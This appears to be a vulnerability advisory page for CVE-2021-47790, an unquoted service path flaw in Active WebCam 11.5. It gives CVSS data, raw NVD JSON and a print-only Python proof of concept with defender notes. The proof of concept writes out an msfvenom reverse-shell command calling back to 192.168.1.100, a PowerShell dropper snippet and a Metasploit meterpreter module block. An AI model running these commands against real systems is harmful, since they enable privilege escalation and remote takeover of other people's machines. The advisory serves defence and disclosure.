Security Vulnerability Report
CVE-2021-47790 CVSS 7.8 HIGH

CVE-2021-47790

Published: 2026-01-16 00:16:23
Last Modified: 2026-01-30 00:59:48

Description

Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pysoft:active_webcam:11.5:*:*:*:*:*:*:* - VULNERABLE
Active WebCam 11.5 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
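# CVE-2021-47790 PoC - Unquoted Service Path Exploitation
# Target: Active WebCam 11.5
# This PoC demonstrates the unquoted service path vulnerability (CWE-428).
#
# Scope: every function below only prints what a stage would involve. The
# script builds no payload, writes no file and controls no service.
#
# Defender notes:
# - Root cause: the service's ImagePath contains spaces and is not wrapped in
#   quotes, so Windows may try a shorter prefix of that path as the program.
#   Each parent directory that ends before a space in the path therefore has
#   to be non-writable for unprivileged users.
# - Fix: wrap the service's ImagePath in double quotes.
# - Audit: list service paths (e.g. `sc qc <service>` or
#   `Get-CimInstance Win32_Service | Select-Object Name, PathName`) and flag
#   any unquoted PathName that contains a space.
# - Detection: alert on executables created directly in those parent
#   directories and on a service process whose image is not the configured
#   binary.
import os
import subprocess
import shutil

# Step 1: Identify the vulnerable service path
# For Active WebCam, the service path typically looks like:
# C:\Program Files\Active WebCam\bin\Service.exe
# NOTE(review): path as given on the page; confirm it against the installed
# service's actual configuration.
vulnerable_path = r"C:\Program Files\Active WebCam\bin\Service.exe"
exploit_dir = r"C:\Program Files"
# NOTE(review): kept as published. Whether this exact name is ever tried
# depends on where the spaces fall in the configured ImagePath; verify it
# against the referenced advisory before using it as a detection indicator.
malicious_exe = os.path.join(exploit_dir, "Program.exe")


# Step 2: Create malicious executable
# In real attack, this would be a reverse shell or meterpreter payload
def create_malicious_exe():
    """Print how the stand-in executable would be produced; create nothing.

    Only echoes the generation command quoted on the page and the path the
    file would be saved to. No payload is generated and no file is written.

    Returns:
        None
    """
    # Generate reverse shell payload using msfvenom
    # msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > Program.exe
    # Example command to generate the payload:
    payload_cmd = "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o Program.exe"
    print(f"[*] Payload generation command: {payload_cmd}")
    print(f"[*] Malicious executable would be saved to: {malicious_exe}")

    # Alternative: Use PowerShell for quick exploitation
    # This creates a simple executable using PowerShell
    # Reference text only: the string is never executed or written anywhere,
    # and its base64 body is elided ("...") on the page.
    ps_payload = '''
    $payload = "$env:windir\\System32\\cmd.exe /c calc.exe"
    $exePath = "C:\\Program Files\\Program.exe"
    [System.IO.File]::WriteAllBytes($exePath, [System.Convert]::FromBase64String("..."))
    '''
    print("[*] PowerShell payload script available for deployment")


# Step 3: Place malicious executable in the path
def place_malicious_exe():
    r"""Report where the stand-in executable would go; copy nothing.

    The page states that this step needs write access to
    ``C:\Program Files``. Default Windows ACLs normally deny that to
    standard users, so the step is only reachable where the directory
    permissions have been loosened. Checking those ACLs is therefore part of
    assessing real exposure.

    Returns:
        bool: True if ``exploit_dir`` exists on this host, otherwise False.
    """
    if not os.path.exists(exploit_dir):
        return False
    # In real attack: copy malicious executable to exploit_dir
    print(f"[!] Placing malicious executable at: {malicious_exe}")
    # Deliberately left disabled by the author; nothing is copied:
    # os.system(f"copy malicious.exe {malicious_exe}")
    return True


# Step 4: Trigger service restart (requires admin privileges or service restart)
def trigger_exploitation():
    """Print the service restart the page describes; restart nothing.

    The page lists these ways the service could be restarted:
    - sc stop <service> && sc start <service>
    - system restart
    - Task Scheduler

    An unexpected stop/start of this service shows up in the Service Control
    Manager entries of the Windows System event log, which is a useful
    signal to monitor.

    Returns:
        None
    """
    # NOTE(review): service name as given on the page; confirm on a host.
    service_name = "ActiveWebCam"
    print(f"[*] Service restart command: sc stop {service_name} && sc start {service_name}")
    print("[*] Or wait for system reboot")


# Metasploit Framework module usage:
# use exploit/windows/local/service_permissions
# set SESSION <session_id>
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST <attacker_ip>
# set LPORT 4444
# run
# NOTE(review): the module named above targets weak service permissions, a
# different misconfiguration from the unquoted path (CWE-428) this advisory
# describes; treat the block as illustrative only.

if __name__ == "__main__":
    print("=== CVE-2021-47790 Unquoted Service Path PoC ===")
    create_malicious_exe()
    place_malicious_exe()
    trigger_exploitation()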

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47790", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.640", "lastModified": "2026-01-30T00:59:47.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access."}, {"lang": "es", "value": "Active WebCam 11.5 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta de servicio mal configurada al colocar ejecutables maliciosos en ubicaciones de directorio específicas para obtener acceso administrativo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pysoft:active_webcam:11.5:*:*:*:*:*:*:*", "matchCriteriaId": "C1A3DBF5-8958-4809-9DB5-393631788D88"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50273", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.pysoft.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.techspot.com/downloads/175-active-webcam.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/active-webcam-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50273", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}